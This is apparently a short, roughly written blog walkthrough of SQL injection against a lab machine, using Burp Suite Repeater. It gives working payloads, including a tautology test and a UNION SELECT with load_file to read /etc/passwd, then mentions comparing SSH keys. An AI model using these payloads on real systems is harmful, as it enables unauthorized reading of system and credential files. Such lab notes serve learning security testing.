==> Open burpsuite and intecept on
==> I use parameter 1 or 1=1
==> If have intercepted --> send to reperter
==> In sql injection i use parameter --> 1+union+select+null,load_file(0xascii etc/passwd)--+-
==> I get decode /etc/passwd --> 2f6574632f7061737377640a
==> I get list of system on repeter with parameter :
--> 1+union+select+null,load_file(0x2f6574632f7061737377640a)--+-
==> This is list which i got :
==> I use ssh and compare rsa key.
==> But i don't get match key.
Using file inclusion
==> we can see user on system like root , msfadmin, user etc.....
No comments:
Post a Comment